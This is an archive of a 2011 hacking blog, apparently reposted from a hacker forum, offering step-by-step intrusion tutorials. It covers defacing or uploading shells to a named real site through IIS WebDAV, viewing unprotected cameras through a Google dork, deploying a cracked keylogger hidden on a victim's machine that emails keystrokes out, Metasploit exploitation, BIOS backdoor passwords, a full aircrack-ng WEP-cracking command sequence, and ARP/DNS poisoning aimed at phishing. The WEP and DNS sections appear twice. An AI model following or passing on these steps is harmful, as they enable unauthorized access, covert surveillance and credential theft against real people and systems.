Archive for June 2011
How to Hack Website with IIS Exploit. [Tutorial]
In IIS Exploit we can upload the Defaced page on the Vulnerable Server without any Login. It is most Easiest way to Hack any site.
STEP 1: Click on Start button and open "RUN".
STEP 2: Now Type this in RUN
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
STEP 3: Now "Right-Click" in the folder and Goto "New" and then "Web Folder".
STEP 4: Now type the name of the Vulnerable site in this. e.g." http://autoqingdao.com/ " and click "Next".
STEP 5: Now Click on "Finish"
STEP 6: Now the folder will appear. You can open it and put any deface page or anything.
STEP 7: I put text file in that folder. Named "securityalert.txt" (you can put a shell or HTML file also). If the file appear in the folder then the Hack is successful but if it don't then the site is not Vulnerable.
.
Now to view the uploaded site i will go to "http://autoqingdao.com/securityalert.txt"In your case it will be " www.[sitename].com/[file name that you uploaded] "
Hacking Security Cameras with Google !
Now, this hack that i am going to teach you give you access to the unprotected Security Cameras. Like this you can view what is happening in front of those cameras and also you can change the direction of the Cameras.
Following is step by step guide.
STEP 1: Open www.google.com and Type the following in search bar:
inurl:"viewerframe?mode=motion"
STEP 2: Now open any site like http://64.107.8.159/ViewerFrame?Mode=Motion It will look like following:
As you can see that you can view through that security camera.
STEP 3: You can also move the camera with these buttons.
So now you can have fun and impress others.
How to set up Ardamax and make Remote Packages. [Tutorial] [VIDEO]
The first step is to download the Ardamax from http://hackthepc.blogspot.com/2011/04/ardamax-keylogger-v376-full-free-crack.html and install it.
After installation you will see the icon of Ardamax in the lower-left corner of the PC. Left-Click on it and goto "Options". Like shown below:
Then a Window will open. In this first 'Goto" Invisibility Tab. and TICK all the options as shown below. This will make the keylogger fully Invisible on the PC.
After that goto Option and select the Hotkey by which you will again open the Ardamax as shown below ,because it will no more visible any where.
Now the keylogger is fully Invisible and will record the keystrokes and pictures. You will need Hotkey to open this Viewer again.
============================================
Remote Package Creation
============================================
This part is easy just follow the following steps:
- Right-Click on the Ardamax icon and goto "Remote Installation.."
Then just click "Next" till you reach "Control", Here you select the information that will be sent.
Then click "Next" and you will come to the "Email" here fill the information about the email which will receive the information.
Then just click "Next" and then on the "Destination" page select the Icon of the Package, then click "Finish". Now you have completed the work. The package that has been created can now be sent to anyone and then it will sent you the Keystrokes and Pictures on the "Email" that you gave.
VIDEO TUTORIAL
===============
Posted by Anonymous
How to Hack a computer using Metasploit ? with Video
Metasploit is one of the greatest Hacking tools ever. It makes the hacking easy for the Script Kiddies (new hackers). But Question comes How to use it to hack a computer?
Metasploit Framework comes in command-line as well as GUI version. This article will deal with the command-line version. Followings are the basic commands of Metasploit that you should Learn by Heart.
1: help (show the commands.)
2: show info XXXX (to show the information on specified XXXX value, that is can be exploit or payload)
3: show options ( to show the options for a exploit and payload. Like RHOST, LHOST)
4: show exploits/payloads (to get a list of exploits/payloads)
5: use XXXX (to select the name of the exploit.)
6: set XXXX (to set the value of RHOST, LHOST or payload)
7: exploit (to launch a exploit on targeted machine.)
Note: To hack a computer using Metasploit first you should have the enough information of the target including
1: IP address
2: Open Ports
3: services running
4: Version of software running
All of these need a little work. A famous tool to do all of these is NMAP on which I have written some articles.
Now the first step is choosing a right exploit for the vulnerabilities in the machine. To determine the exploit for the attack you need all the things noted above. For example the computer is running a SMTP server on Port 25 and there is a exploit on it than you hack that computer.
To choose an exploit following command is there:
Use [exploits address . e.g. Exploit/windows/smtp/xxx. ]
Now you need a payload (payload is a piece of program that will be executed if vulnerability is exploited). To get a list of all the payloads available for the exploit Just type following command.
Show payloads
Now choose an appropriate a payload from it. The only thing left is to set the fields for the attack. List of Most Probable fields to be set is given bellow.
RHOST = The IP address of the computer to be attacked.
RPORT = The Port of the service to exploited (it set by default)
LHOST = The IP address of your computer (it set by default)
LPORT = The default port of your Metasploit program (it set by default)
Now the Last step is to type the following command and Launch attack to the computer.
exploit
After typing this command the attack will be launched and if vulnerability is successfully exploited the payload will be executed and a shell (you can take it as command prompt) will be launched which will allow you to do anything with the computer that you have attacked.
==========================================
Video Tutorial
==========================================
==========================================
Video Tutorial
==========================================
Saturday, June 25, 2011
Posted by Anonymous
List of Default BIOS (Backdoor) Passwords.
If You have forgotten the real password of the BIOS then it is very difficult to get it back. One alternative is to guess the Backdoor Password which will give you access to the machine.
Award BIOS backdoor passwords:
ALFAROME
BIOSTAR
KDD
ZAAADA
ALLy
CONCAT
Lkwpeter
ZBAAACA
aLLy
CONDO
LKWPETER
ZJAAADC
aLLY
Condo
PINT
01322222
ALLY
d8on
pint
589589
aPAf
djonet
SER
589721
award
HLT
SKY_FOX
595595
AWARD_SW
J64
SYXZ
598598
AWARD?SW
J256
syxz
AWARD SW
J262
shift + syxz
AWARD PW
j332
TTPTHA
AWKWARD
j322
awkward
AMI BIOS Backdoor Passwords:
AMI
BIOS
PASSWORD
HEWITT RAND
AMI?SW
AMI_SW
LKWPETER
CONDO
Phoenix BIOS Backdoor Passwords:
PHOENIX
CMOS
BIOS
Misc. Common Passwords
BIOSTAR
biostar
biosstar
CMOS
cmos
LKWPETER
lkwpeter
setup
SETUP
Syxz
Wodj
Other BIOS Passwords by Manufacturer
Manufacturer----Password
VOBIS & IBM---- merlin
Dell------------Dell
Biostar-------- Biostar
Compaq----------Compaq
Enox------------xo11nE
Epox------------central
Freetech--------Posterie
IWill-----------iwill
Jetway----------spooml
Packard Bell----bell9
QDI-------------QDI
Siemens---------SKY_FOX
TMC------------BIGO
Toshiba--------Toshiba
Toshiba--------BIOS
Biostar--------Biostar-----Q54arwms
Compaq---------Compaq
Daewoo---------Daewuu
Daytek---------Daytec
Dell-----------Dell
Enox-----------xo11nE
Epox-----------central
Freetech-------Posterie
HP Vectra------hewlpack
IBM------------IBM---------MBIUO--------sertafu
Iwill----------iwill
Total Guide to WEP Hacking [WIFI] [TUT]
This is my First Ever Tutorial at Wireless Hacking... This guide is aimed to help you crack WEP Passwords.. As said, this is a Total n00b Guide to Wireless Hacking..
The Stuff that you are going to need is
(1) Backtrack (You can get it here)
(2) Wireless Card that Supports Packet Injection
Before we Start, I take it for Granted that you are aware of a Few things...
I Hope You already have a Live CD, Bootable USB or a Virtual Backtrack Installed in your System. In case of Virtual Machine, You will need an External Wireless Card. And in case you don't already have Backtrack, I suggest you bookmark this page and get it first.
Also, I hope you have googled by now to see if your Wireless Card will support Packet Injection or not. Again, if you haven't already done that go and get this done first :)
Now that we are Ready.. Lets Begin..
If You are Using a Boot CD, As in my case, You will see the folllowing screen when the CD Loads.
Just Select "Start BackTrack FrameBuffer (1024x768)"
or Select "Start BackTrack FrameBuffer (800x600)"
Depending On your Display Settings. These Options are to get to the GUI of Backtrack.
What will follow next is the Loading of all Drivers and Other Processes. Once they come to a halt. You will See a Cursor. Just Type in "startx".
Once, the Startup is Completed you will be at the Desktop of Backtrack
Now, We better get our Network Interfaces Started. While there are a few ways of Doing that. The simplest way is through the Menu.
Once, Network has been Started. We need to go Start a Konsole. Which we will be using to enter all commands to crack wep.
Once, inside the Konsole. Type in "iwconfig" to see the status of all the network interfaces of your Machine.
In My Case, My Wireless Interface is "wlan0". In your case, It can be any other or might just be wlan0. Remember, whatever your interface, replace my "wlan0" with it throughout the Tutorial now.
Now that we know the Interface, we better put it on monitoring mode. To do that, we need to type this command.
airmon-ng start wlan0
Press ENTER and You will see that monitor mode for your Wireless Interface will be enabled now. In my case, the monitor mode has been enabled at "mon0". This will be our new Interface now not "wlan0".
Now that the monitor mode has been enabled. We will scan our Area for any WEP Encrypted Wifi Networks. To do that we need to type the following command.
airodump-ng --encrypt wep mon0
What you will see Next will be A List of All the WEP Encrypted WIFI Networks around you. There are some details in there too. Here's a simple explanation of a few of them
BSSID = MAC Address of the slave (Most Important)
PWR = Signal Strength
CH = Channel Number
ENC = Encryption Type
ESSID= Name of slave's Network
#Data = Amount of IVS Collected (Most Important)
#/s = IVS Per Second
You Might just wanna copy the BSSID as it is going to be used a lot.
Our slave's Details
BSSID= 00:50:F1:12:12:10
CH = 1
ESSID= {censored}
Something, You might wanna know but is not useful for WEP is that the "STATION" are the Computers currently connected to the Network. As you can notice, My slave currently has a Computer connected to it.While STATION is important for WPA Hacking, It is not useful for WEP Hacking.
Now that we have our slave in Sight. It is now time to target our Interface on collecting packets from it. So, now we will make our airodump-ng more specific to target it on our slave's Network.
airodump-ng --bssid 00:50:F1:12:12:10 --channel 1 --encrypt wep --ivs --write wephack mon0
Once You hit ENTER. You will notice that now our Wireless Interface will only focus on Our slave's Network (In this case: 00:50:F1:12:12:10)
Now that we have targeted the slave's Network. It is time to Start gathering Packets from it. There are two ways for Doing it.
(1) Fragment Attack
(2) Arpreplay
Its your Lucky day..lol.. I will be going through both.
But before these attacks, we need to fool the Router into thinking that we are authenticated to receive data from it. To do this we will "fakeauth" the slave's Router.
aireplay-ng --fakeauth 0 -a 00:50:F1:12:12:10 mon0
Once, You hit ENTER you will see something Like this when the Attack is Successful.
02:29:07 Sending Authentication Request (Open System) [ACK]
02:29:07 Authentication successful
02:29:07 Sending Association Request [ACK]
02:29:07 Association Successful :-) (AID: 1)
Now that the Association is Successful. We will initiate the Process to collect Arps. First, We will try Arpreplay as it is a very simple attack. Here's the command.
aireplay-ng --arpreplay -b 00:50:F1:12:12:10 mon0
Once, You hit ENTER you will see something Like this. After a Few Seconds or Maybe a few minutes, You may see the number of arps rise. If that happens ARPREPLAY has been successful or else, We will have to move on to Fragment Attack.
OK. Since, Our Arpreplay has failed we will now initiate a Fragment attack. Here's the code
aireplay-ng --fragment -b 00:50:F1:12:12:10 mon0
Once, You hit ENTER. Out Network Interface will start to collect Packets from The slave's Router. When it asks you to use a particular packet. Just hit Y and press ENTER.
It will now try to capture 1500 bytes of Keystream. This keystream will be stored in a XOR file as in my case- fragment -0123-023217.xor We will later use this very captured keystream to forge it into a packet using packetforge-ng.
Basically, what we are going to do is use that keystream and make a valid packet out of it. Then we will use that packet to arpreplay our slave's Router. So, Lets make a packet then..
packetforge-ng --arp -a 00:50:F1:12:12:10 -h 11:22:33:44:55:66 -l 255.255.255.255 -k 255.255.255.255 -y fragment-0123-023217.xor -w wepfrag
OK. To keep this command simple let me just say this. Here, "-a" is the slave's MAC Address and "-h" is our MAC Address which I just entered for namesake. Let the rest of the things be the same. For those extra Information Seekers.. You can pm me or just google it.
Just hit ENTER and there we go, the Packet has been made.
Now, We will use this packet to arp attack the slave's Router. Here's the Command.
aireplay-ng --arpreplay -r wepfrag -b 00:50:F1:12:12:10 mon0
Just hit ENTER and the Mag!c Finally begins...
Now, Its Time to Play Wait & Watch... Just Wait till the #Data Table reaches 30000 or close...
Once, You have enough #Data Packets. It is time to Initiate the Final Kill. aircrack. Here's the command.
aircrack-ng wephack-01.ivs
Hit a Final ENTER and See the Process.. Will take a few Seconds or Minutes.. depending on the Password....
And Voila... Here it is....
===================================================================
This article was published on http://www.hackforums.net/showthread.php?tid=1010102
and i take no credit for writing it.
===================================================================
The Stuff that you are going to need is
(1) Backtrack (You can get it here)
(2) Wireless Card that Supports Packet Injection
Before we Start, I take it for Granted that you are aware of a Few things...
I Hope You already have a Live CD, Bootable USB or a Virtual Backtrack Installed in your System. In case of Virtual Machine, You will need an External Wireless Card. And in case you don't already have Backtrack, I suggest you bookmark this page and get it first.
Also, I hope you have googled by now to see if your Wireless Card will support Packet Injection or not. Again, if you haven't already done that go and get this done first :)
Now that we are Ready.. Lets Begin..
If You are Using a Boot CD, As in my case, You will see the folllowing screen when the CD Loads.
Just Select "Start BackTrack FrameBuffer (1024x768)"
or Select "Start BackTrack FrameBuffer (800x600)"
Depending On your Display Settings. These Options are to get to the GUI of Backtrack.
What will follow next is the Loading of all Drivers and Other Processes. Once they come to a halt. You will See a Cursor. Just Type in "startx".
Once, the Startup is Completed you will be at the Desktop of Backtrack
Now, We better get our Network Interfaces Started. While there are a few ways of Doing that. The simplest way is through the Menu.
Once, Network has been Started. We need to go Start a Konsole. Which we will be using to enter all commands to crack wep.
Once, inside the Konsole. Type in "iwconfig" to see the status of all the network interfaces of your Machine.
In My Case, My Wireless Interface is "wlan0". In your case, It can be any other or might just be wlan0. Remember, whatever your interface, replace my "wlan0" with it throughout the Tutorial now.
Now that we know the Interface, we better put it on monitoring mode. To do that, we need to type this command.
airmon-ng start wlan0
Press ENTER and You will see that monitor mode for your Wireless Interface will be enabled now. In my case, the monitor mode has been enabled at "mon0". This will be our new Interface now not "wlan0".
Now that the monitor mode has been enabled. We will scan our Area for any WEP Encrypted Wifi Networks. To do that we need to type the following command.
airodump-ng --encrypt wep mon0
What you will see Next will be A List of All the WEP Encrypted WIFI Networks around you. There are some details in there too. Here's a simple explanation of a few of them
BSSID = MAC Address of the slave (Most Important)
PWR = Signal Strength
CH = Channel Number
ENC = Encryption Type
ESSID= Name of slave's Network
#Data = Amount of IVS Collected (Most Important)
#/s = IVS Per Second
You Might just wanna copy the BSSID as it is going to be used a lot.
Our slave's Details
BSSID= 00:50:F1:12:12:10
CH = 1
ESSID= {censored}
Something, You might wanna know but is not useful for WEP is that the "STATION" are the Computers currently connected to the Network. As you can notice, My slave currently has a Computer connected to it.While STATION is important for WPA Hacking, It is not useful for WEP Hacking.
Now that we have our slave in Sight. It is now time to target our Interface on collecting packets from it. So, now we will make our airodump-ng more specific to target it on our slave's Network.
airodump-ng --bssid 00:50:F1:12:12:10 --channel 1 --encrypt wep --ivs --write wephack mon0
Once You hit ENTER. You will notice that now our Wireless Interface will only focus on Our slave's Network (In this case: 00:50:F1:12:12:10)
Now that we have targeted the slave's Network. It is time to Start gathering Packets from it. There are two ways for Doing it.
(1) Fragment Attack
(2) Arpreplay
Its your Lucky day..lol.. I will be going through both.
But before these attacks, we need to fool the Router into thinking that we are authenticated to receive data from it. To do this we will "fakeauth" the slave's Router.
aireplay-ng --fakeauth 0 -a 00:50:F1:12:12:10 mon0
Once, You hit ENTER you will see something Like this when the Attack is Successful.
02:29:07 Sending Authentication Request (Open System) [ACK]
02:29:07 Authentication successful
02:29:07 Sending Association Request [ACK]
02:29:07 Association Successful :-) (AID: 1)
Now that the Association is Successful. We will initiate the Process to collect Arps. First, We will try Arpreplay as it is a very simple attack. Here's the command.
aireplay-ng --arpreplay -b 00:50:F1:12:12:10 mon0
Once, You hit ENTER you will see something Like this. After a Few Seconds or Maybe a few minutes, You may see the number of arps rise. If that happens ARPREPLAY has been successful or else, We will have to move on to Fragment Attack.
OK. Since, Our Arpreplay has failed we will now initiate a Fragment attack. Here's the code
aireplay-ng --fragment -b 00:50:F1:12:12:10 mon0
Once, You hit ENTER. Out Network Interface will start to collect Packets from The slave's Router. When it asks you to use a particular packet. Just hit Y and press ENTER.
It will now try to capture 1500 bytes of Keystream. This keystream will be stored in a XOR file as in my case- fragment -0123-023217.xor We will later use this very captured keystream to forge it into a packet using packetforge-ng.
Basically, what we are going to do is use that keystream and make a valid packet out of it. Then we will use that packet to arpreplay our slave's Router. So, Lets make a packet then..
packetforge-ng --arp -a 00:50:F1:12:12:10 -h 11:22:33:44:55:66 -l 255.255.255.255 -k 255.255.255.255 -y fragment-0123-023217.xor -w wepfrag
OK. To keep this command simple let me just say this. Here, "-a" is the slave's MAC Address and "-h" is our MAC Address which I just entered for namesake. Let the rest of the things be the same. For those extra Information Seekers.. You can pm me or just google it.
Just hit ENTER and there we go, the Packet has been made.
Now, We will use this packet to arp attack the slave's Router. Here's the Command.
aireplay-ng --arpreplay -r wepfrag -b 00:50:F1:12:12:10 mon0
Just hit ENTER and the Mag!c Finally begins...
Now, Its Time to Play Wait & Watch... Just Wait till the #Data Table reaches 30000 or close...
Once, You have enough #Data Packets. It is time to Initiate the Final Kill. aircrack. Here's the command.
aircrack-ng wephack-01.ivs
Hit a Final ENTER and See the Process.. Will take a few Seconds or Minutes.. depending on the Password....
And Voila... Here it is....
===================================================================
This article was published on http://www.hackforums.net/showthread.php?tid=1010102
and i take no credit for writing it.
===================================================================
Monday, June 20, 2011
Posted by Anonymous
[TUT] ARP - DNS Poisoning using Cain
Hey guys this Tutorial is about DNS poisoning on your network using Cain & Abel.
Download Cain HERE
This Tutorial Will be limited to just redirecting the traffic to another website (I had a better idea on my mind, but I can’t post it because of the rules).
Note: This Tutorial is for educational purposes only (you’ll be responsible for your own actions)
First What is the DNS ? (wikipedia.org)
The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide. An often used analogy to explain the Domain Name System is that it serves as the "phone book" for the Internet by translating human-friendly computer hostnames into IP addresses. For example, http://www.example.com translates to208.77.188.166.
What does poisoning the DNS allow us to do ?
It allows us to redirect the traffic to another website.
First This is the structure of the network :
1 , 2 and 3 are computers
1 is the computer being the gateway (could be a router) (172.128.254.1)
2 is the target computer (172.128.254.10)
3 is the attacker using cain
Note : IPs are just used for this tutorial and chosen randomly.
Our work is on computer number 3 :
1-After you install cain , open it and go to the sniffer tab
2-Click on configure and choose your adapter
3-Enable the sniffer (click on the second icon in the toolbar next to the open icon)
4-Right click in the empty area and choose scan MAC addresses. We get the results above.
5-Click on the APR Tab
6-Click on the + sign in the toolbar to add a new ARP poison routing
7-choose the gateway which is 172.128.254.1 , in the next list you’ll get the IP of the computer 2 which is 172.128.254.10 and click ok
8-now click on the APR-DNS tab
9-click on the + sign
10-enter the web address that you want to spoof , (in this case when the user goes to facebook he’ll be redirected to myspace) click on resolve type the web address that you want to redirect the user to it, and click ok, and you’ll get the IP of the web address, then click ok
you'll get something like this:
11-now to make this work we have to enable APR poisoning , click on the icon next to the sniffer icon, and everything should work as we expect.
Now the computer 2 will get the routes poisoned and when the user requestshttp://www.facebook.com he will be redirected to http://www.myspace.com .
Imagine what you can do with this technique.
You can also redirect Facebook to Your Phishing Page and in this way other person wouldnt even know!!!
BEWARE!!!! >> you can freak the hell out of someone with it. so be careful!!!!
=============================================================
This Article was originally published on . http://www.hackforums.net/showthread.php?tid=262997
AND I TAKE NO CREDIT OF IT! I AM ONLY SPREADING THE WORD.
==============================================================
Download Cain HERE
This Tutorial Will be limited to just redirecting the traffic to another website (I had a better idea on my mind, but I can’t post it because of the rules).
Note: This Tutorial is for educational purposes only (you’ll be responsible for your own actions)
First What is the DNS ? (wikipedia.org)
The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide. An often used analogy to explain the Domain Name System is that it serves as the "phone book" for the Internet by translating human-friendly computer hostnames into IP addresses. For example, http://www.example.com translates to208.77.188.166.
What does poisoning the DNS allow us to do ?
It allows us to redirect the traffic to another website.
First This is the structure of the network :
1 , 2 and 3 are computers
1 is the computer being the gateway (could be a router) (172.128.254.1)
2 is the target computer (172.128.254.10)
3 is the attacker using cain
Note : IPs are just used for this tutorial and chosen randomly.
Our work is on computer number 3 :
1-After you install cain , open it and go to the sniffer tab
2-Click on configure and choose your adapter
3-Enable the sniffer (click on the second icon in the toolbar next to the open icon)
4-Right click in the empty area and choose scan MAC addresses. We get the results above.
5-Click on the APR Tab
6-Click on the + sign in the toolbar to add a new ARP poison routing
7-choose the gateway which is 172.128.254.1 , in the next list you’ll get the IP of the computer 2 which is 172.128.254.10 and click ok
8-now click on the APR-DNS tab
9-click on the + sign
10-enter the web address that you want to spoof , (in this case when the user goes to facebook he’ll be redirected to myspace) click on resolve type the web address that you want to redirect the user to it, and click ok, and you’ll get the IP of the web address, then click ok
you'll get something like this:
11-now to make this work we have to enable APR poisoning , click on the icon next to the sniffer icon, and everything should work as we expect.
Now the computer 2 will get the routes poisoned and when the user requestshttp://www.facebook.com he will be redirected to http://www.myspace.com .
Imagine what you can do with this technique.
You can also redirect Facebook to Your Phishing Page and in this way other person wouldnt even know!!!
BEWARE!!!! >> you can freak the hell out of someone with it. so be careful!!!!
=============================================================
This Article was originally published on . http://www.hackforums.net/showthread.php?tid=262997
AND I TAKE NO CREDIT OF IT! I AM ONLY SPREADING THE WORD.
==============================================================
Wednesday, June 15, 2011
Posted by Anonymous